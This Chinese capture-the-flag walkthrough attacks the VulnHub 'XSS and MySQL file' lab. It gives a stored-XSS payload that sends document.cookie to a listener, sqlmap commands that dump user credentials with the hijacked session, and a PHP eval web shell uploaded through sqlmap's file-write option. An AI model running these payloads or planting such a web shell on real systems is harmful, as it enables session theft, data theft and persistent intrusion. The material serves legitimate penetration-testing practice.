XSS_and_Mysql_file靶场攻略

下载地址

https://download.vulnhub.com/pentesterlab/xss_and_mysql_file.iso

扫描ip

复制代码
arp-scan -l 

扫描端口

复制代码
nmap -sS -sV -p- 192.168.89.137

扫描目录

复制代码
dirsearch -u 192.168.89.137

访问80端口,点击测试

测试漏洞位置

复制代码
<script>alert(1)</script>

设置存储型xss,kali监听

复制代码
<script>document.write('<img src="http://192.168.89.137:8080/?' + document.cookie +'"/>');</script>
复制代码
python -m http.server 8080

一分钟左右会有cookie回显

登录admin

点击admin,随便输入账号密码抓包

修改cookie为kali监听到的,放行后可登录

点击edit,使用sqlmap注入

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --dbs --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' --tables --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' -T 'users' --dump --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

得到账号密码

蚁剑shell

在kali创建一个php文件

复制代码
vim 1.php

<?php @eval($_POST['123456']);?>

使用sqlmap将文件放到网站

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4" --file-write /home/kali/1.php --file-dest /var/www/css/1.php

使用蚁剑连接

相关推荐
曹牧8 分钟前
C#:记录日志
服务器·前端·c#
小飞侠在吗10 分钟前
Vue customRef
前端·javascript·vue.js
xhxxx29 分钟前
别再让 AI 自由发挥了!用 LangChain + Zod 强制它输出合法 JSON
前端·langchain·llm
指尖跳动的光41 分钟前
判断页签是否为活跃状态
前端·javascript·vue.js
用泥种荷花1 小时前
【前端学习AI】大模型调用实战
前端
Lan.W1 小时前
element UI + vue2 + html实现堆叠条形图 - 横向分段器
前端·ui·html
FAQEW1 小时前
若依(RuoYi-Vue)单体架构实战手册:自定义业务模块全流程开发指南
前端·后端·架构·若依二开
神算大模型APi--天枢6461 小时前
合规与高效兼得:国产全栈架构赋能行业大模型定制,从教育到工业的轻量化落地
大数据·前端·人工智能·架构·硬件架构
千寻girling1 小时前
马上元旦节了,手写一个《前端脚手架》庆祝一下 !
前端
嚣张丶小麦兜2 小时前
认识vite
前端·javascript·vue.js